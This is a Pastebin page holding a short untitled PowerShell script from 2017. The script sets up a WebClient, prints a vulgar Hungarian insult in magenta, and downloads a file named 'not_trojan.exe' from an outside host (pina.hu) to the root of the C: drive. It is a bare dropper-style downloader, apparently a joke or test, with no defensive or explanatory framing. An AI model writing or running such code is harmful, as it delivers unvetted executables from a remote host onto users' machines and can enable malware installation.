Advertisement
Guest User

Untitled

a guest
Feb 15th, 2017
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. $Username = ""
  2. $Password = ""
  3. $Path = Get-Location
  4. $WebClient = New-Object System.Net.WebClient
  5. $WebClient.Credentials = New-Object System.Net.Networkcredential($Username, $Password)
  6. Write-Host "Lófasz a seggedbe" $Path -ForegroundColor Magenta
  7. $Url = "http://pina.hu/not_trojan.exe"
  8. $Path = "C:\not_trojan.exe"
  9. $WebClient.DownloadFile($url, $path)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement